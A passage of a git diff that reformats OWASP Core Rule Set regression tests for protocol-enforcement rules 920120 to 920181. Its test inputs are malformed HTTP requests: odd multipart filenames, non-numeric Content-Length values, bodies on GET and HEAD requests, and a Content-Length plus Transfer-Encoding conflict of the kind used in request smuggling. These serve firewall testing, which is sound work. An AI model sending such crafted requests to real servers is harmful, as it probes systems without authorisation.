"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name=""; filename="" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml index cc167e38f..7b8191f98 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml @@ -1,122 +1,121 @@ --- meta: author: "Paul-Beckett, azurit" - enabled: true - name: "920121.yaml" description: "Tests to trigger rule 920121" +rule_id: 920121 tests: - - test_title: 920121-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te;st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te;st.txt" + Content-Type: text/plain - Some-file-test-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-2 + Some-file-test-here + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920121] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te'st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te'st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-3 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920121] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te\"st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te\"st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-4 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920121] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te=st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te=st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-5 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920121] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="test.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="test.txt" + Content-Type: text/plain - Characters-shouldn't-trigger-rule-"-match-in-;-file - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: "id \"920121\"" + Characters-shouldn't-trigger-rule-"-match-in-;-file + ----------397236876-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920121] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml index 4678ce4f9..aa61ceb50 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml @@ -1,108 +1,103 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920160.yaml" description: "Tests to trigger rule 920160" +rule_id: 920160 tests: - - # Non digit Content-Length without content-type - test_title: 920160-1 + - test_id: 1 + desc: Non digit Content-Length without content-type stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Length: "NotDigits" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: [400] - - # Non digit content-length with content-type - test_title: 920160-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Length: "NotDigits" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 2 + desc: Non digit content-length with content-type stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "NotDigits" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: [400] - - # Mixed digit and non digit content length - test_title: 920160-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "NotDigits" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 3 + desc: Mixed digit and non digit content length stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "123x" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: [400] - - # Test is based in httpbin.org, so backend returns 405 if you are not posting to /post - # Apache auto corrects for this error now so the log should not contain anything - test_title: 920160-4 - desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "123x" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 4 + desc: | + Content-Length HTTP header is not numeric (920160) from old modsec regressions + Test is based in httpbin.org, so backend returns 405 if you are not posting to /post + Apache auto corrects for this error now so the log should not contain anything stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Length: '3' - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /post - version: HTTP/1.0 - data: abc - output: - status: [200] - no_log_contains: id "920160" - - test_title: 920160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Length: '3' + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /post + version: HTTP/1.0 + data: abc + output: + status: 200 + log: + no_expect_ids: [920160] + - test_id: 5 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Length: "3;" - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.0 - data: abc - output: - status: [200, 403, 400] - # log_contains: id "920160" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Length: "3;" + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.0 + data: abc + output: + status: 400 diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml index 6b28cdc35..a8f4b8942 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml @@ -1,122 +1,122 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920170.yaml" description: "A Selection of tests to trigger rule 920170" +rule_id: 920170 tests: - - # POST Request with data (valid) - test_title: 920170-1 + - test_id: 1 + desc: POST Request with data (valid) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" - - # GET request with data - test_title: 920170-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920170] + - test_id: 2 + desc: GET request with data stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920170\"" - - # Head Request with data - test_title: 920170-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920170] + - test_id: 3 + desc: Head Request with data stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "HEAD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920170\"" - - # GET Request but content length is 0 and data is provided - # Weird HTTP 1.0 support bug in Apache, without newline causes 408 - test_title: 920170-4 + - input: + dest_addr: "127.0.0.1" + method: "HEAD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920170] + - test_id: 4 + desc: | + GET Request but content length is 0 and data is provided. + Weird HTTP 1.0 support bug in Apache, without newline causes 408 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test\r\n" - stop_magic: true - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" - - # GET request with content length 0 and no data. - test_title: 920170-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test\r\n" + uri: "/" + version: "HTTP/1.1" + autocomplete_headers: false + output: + log: + no_expect_ids: [920170] + - test_id: 5 + desc: GET request with content length 0 and no data. stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" - - test_title: 920170-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920170] + - test_id: 6 desc: GET or HEAD Request with Body Content (920170) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: / - data: abc - version: "HTTP/1.1" - output: - log_contains: id "920170" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: / + data: abc + version: "HTTP/1.1" + output: + log: + expect_ids: [920170] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml index 7d515219a..dbd5fe977 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml @@ -1,76 +1,75 @@ --- meta: author: airween - enabled: true - name: 920171.yaml description: "A Selection of tests to trigger rule 920171" +rule_id: 920171 tests: - # POST Request with data (valid) - test_title: 920171-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked POST request with content "Hi CRS" in two lines - # POST / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" - output: - no_log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked POST request with content "Hi CRS" in two lines + # POST / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" + output: + log: + no_expect_ids: [920171] - # GET Request with chunked data (invalid) - test_title: 920171-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked GET request with content "Hi CRS" in two lines - # GET / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVu\nY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQoz\nDQpIaSANCjMNCkNSUw0KMA0KDQo=" - output: - log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked GET request with content "Hi CRS" in two lines + # GET / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVu\nY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQoz\nDQpIaSANCjMNCkNSUw0KMA0KDQo=" + output: + log: + expect_ids: [920171] - # HEAD Request with chunked data (invalid) - test_title: 920171-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - # this sends a chunked HEAD request with content "Hi CRS" in two lines - # HEAD / HTTP/1.1\r - # Accept: */*\r - # Host: localhost\r - # Transfer-Encoding: chunked\r - # User-Agent: "OWASP CRS test agent"\r - # \r - # 3\r - # Hi \r - # 3\r - # CRS\r - # 0\r - # \r - encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" - output: - log_contains: "id \"920171\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + # this sends a chunked HEAD request with content "Hi CRS" in two lines + # HEAD / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" + output: + log: + expect_ids: [920171] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml index 6af7fc1ac..0ed8225af 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml @@ -1,83 +1,81 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920180.yaml" - description: "Description" +rule_id: 920180 tests: - - test_title: 920180-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - stop_magic: true - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920180" - - test_title: 920180-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + autocomplete_headers: false + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920180] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: id "920180" - - test_title: 920180-3 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920180] + - test_id: 3 desc: POST request missing Content-Length Header (920180) from old modsec regressions stages: - - stage: - input: - stop_magic: true - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.0 - output: - log_contains: id "920180" - - test_title: 920180-4 + - input: + autocomplete_headers: false + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.0 + output: + log: + expect_ids: [920180] + - test_id: 4 desc: Ignore check of CT header if protocol is HTTP/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/2.0 - output: - no_log_contains: id "920180" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/2.0 + output: + log: + no_expect_ids: [920180] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml index 8dd729b78..189f62708 100755 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml @@ -1,28 +1,26 @@ --- meta: author: "fgsch" - enabled: true - name: "920181.yaml" - description: "Description" +rule_id: 920181 tests: - - test_title: 920181-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "POST" - uri: "/anything" - headers: - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Length: 7 - Content-Type: "application/x-www-form-urlencoded" - Transfer-Encoding: "chunked" - User-Agent: "OWASP CRS test agent" - data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" - stop_magic: true - output: - # Apache unsets the Content-Length header if Transfer-Encoding is found! - status: [200] - no_log_contains: id "920181" + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "POST" + uri: "/anything" + headers: + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Length: 7 + Content-Type: "application/x-www-form-urlencoded" + Transfer-Encoding: "chunked" + User-Agent: "OWASP CRS test agent" + data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" + stop_magic: true + output: + # Apache unsets the Content-Length header if Transfer-Encoding is found! + status: 200 + log: + no_expect_ids: [920181] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml index 133323019..86df27281 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml @@ -1,61 +1,59 @@ --- meta: author: "csanders-git, azurit" 